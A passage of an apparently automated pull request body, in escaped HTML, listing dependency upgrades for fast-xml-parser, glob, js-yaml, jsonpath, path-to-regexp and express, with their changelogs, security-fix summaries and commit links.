information.\u003c/p\u003e\n\u003ch2\u003eSecurity Fix\u003c/h2\u003e\n\u003cp\u003eUpdate to this release if you use entity parsing in Fast XML Parser.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/42fbb0bc95e753e03fe52cb0805a8774bba4bf28\"\u003e\u003ccode\u003e42fbb0b\u003c/code\u003e\u003c/a\u003e update release info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/805671cb6c19108b171b876cf3e8865f18cdb8fd\"\u003e\u003ccode\u003e805671c\u003c/code\u003e\u003c/a\u003e increase expansion limit as many system need it\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/9a2cf097c2961d4ad878f618e39fb0a9f5a0e9e5\"\u003e\u003ccode\u003e9a2cf09\u003c/code\u003e\u003c/a\u003e update version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/88d0936a23dabe51bfbf42255e2ce912dfee2221\"\u003e\u003ccode\u003e88d0936\u003c/code\u003e\u003c/a\u003e apply all fixes from v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/d4eb6b4713a8d11e6730943392419040898ecbc0\"\u003e\u003ccode\u003ed4eb6b4\u003c/code\u003e\u003c/a\u003e update release version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/b1b9f633ff30cb4708337355c2789f08bc0558d2\"\u003e\u003ccode\u003eb1b9f63\u003c/code\u003e\u003c/a\u003e update release info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/faccca126e1db96b90084adda6fbe2ea2ed434e7\"\u003e\u003ccode\u003efaccca1\u003c/code\u003e\u003c/a\u003e sync with v5.3.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/ab00cdc49c681b44effbe95d6ee4392616a74aaa\"\u003e\u003ccode\u003eab00cdc\u003c/code\u003e\u003c/a\u003e update package bundle for minor fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/57c61876b47be10616ba47da904c8add26efcb58\"\u003e\u003ccode\u003e57c6187\u003c/code\u003e\u003c/a\u003e Update ReadMe\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/caeda37ebd919c799bf06ccf2f80d1e90e99d474\"\u003e\u003ccode\u003ecaeda37\u003c/code\u003e\u003c/a\u003e fix: emit full JSON string from CLI when no output filename specified (\u003ca href=\"https://redirect.github.com/NaturalIntelligence/fast-xml-parser/issues/710\"\u003e#710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/4.2.2...v4.5.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.2.3 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/isaacs/node-glob/blob/main/changelog.md\"\u003eglob's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003echangeglob\u003c/h1\u003e\n\u003ch2\u003e13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMove the CLI program out to a separate package, \u003ccode\u003eglob-bin\u003c/code\u003e.\nInstall that if you'd like to continue using glob from the\ncommand line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove the unsafe \u003ccode\u003e--shell\u003c/code\u003e option. The \u003ccode\u003e--shell\u003c/code\u003e option is now\nONLY supported on known shells where the behavior can be\nimplemented safely.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.1\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\"\u003eGHSA-5j98-mcp5-4vw2\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--shell\u003c/code\u003e option for the command line, with a warning\nthat this is unsafe. (It will be removed in v12.)\u003c/li\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--cmd-arg\u003c/code\u003e/\u003ccode\u003e-g\u003c/code\u003e as a way to \u003cem\u003esafely\u003c/em\u003e add positional\narguments to the command provided to the CLI tool.\u003c/li\u003e\n\u003cli\u003eDetect commands with space or quote characters on known shells,\nand pass positional arguments to them safely, avoiding\n\u003ccode\u003eshell:true\u003c/code\u003e execution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for node before v20\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eincludeChildMatches: false\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003eExport the \u003ccode\u003eIgnore\u003c/code\u003e class\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--default -p\u003c/code\u003e flag to provide a default pattern\u003c/li\u003e\n\u003cli\u003eexclude symbolic links to directories when \u003ccode\u003efollow\u003c/code\u003e and \u003ccode\u003enodir\u003c/code\u003e\nare both set\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd glob cli\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReturn \u003ccode\u003e'.'\u003c/code\u003e instead of the empty string \u003ccode\u003e''\u003c/code\u003e when the current\nworking directory is returned as a match.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eposix: true\u003c/code\u003e option to return \u003ccode\u003e/\u003c/code\u003e delimited paths, even on\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1f0c1ca01a5f256cd17f543f83e9aaeedd133939\"\u003e\u003ccode\u003e1f0c1ca\u003c/code\u003e\u003c/a\u003e 10.4.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eaf31dcb144750a19842a8319c330d021d4c4d5f\"\u003e\u003ccode\u003eeaf31dc\u003c/code\u003e\u003c/a\u003e whatever, just allow any engines\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/78275168e1bbc7a61e372af1ba58307c27faf0cb\"\u003e\u003ccode\u003e7827516\u003c/code\u003e\u003c/a\u003e 10.4.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/d06c8f8c8288c89a4892f4ebcc23ca21840aa4a1\"\u003e\u003ccode\u003ed06c8f8\u003c/code\u003e\u003c/a\u003e restore support for node 14.latest and 16.latest\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c14b787771f269651f27f6207aaf410fe171f0b6\"\u003e\u003ccode\u003ec14b787\u003c/code\u003e\u003c/a\u003e 10.4.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/8a69def3cad0de9ba26ca831065ffe448d153de3\"\u003e\u003ccode\u003e8a69def\u003c/code\u003e\u003c/a\u003e node 14 no longer supported\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eef7ea35afe511079c5bf83862ed57ece2bbf7fa\"\u003e\u003ccode\u003eeef7ea3\u003c/code\u003e\u003c/a\u003e 10.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c76a7d255c74133ed33dd7aa965598316d12dd25\"\u003e\u003ccode\u003ec76a7d2\u003c/code\u003e\u003c/a\u003e use package-json-from-dist to look up package.json\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.2.3...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jsonpath` from 1.1.1 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/dchester/jsonpath/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 6.2.1 to 6.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 1.8.0 to 1.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.18.2 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca 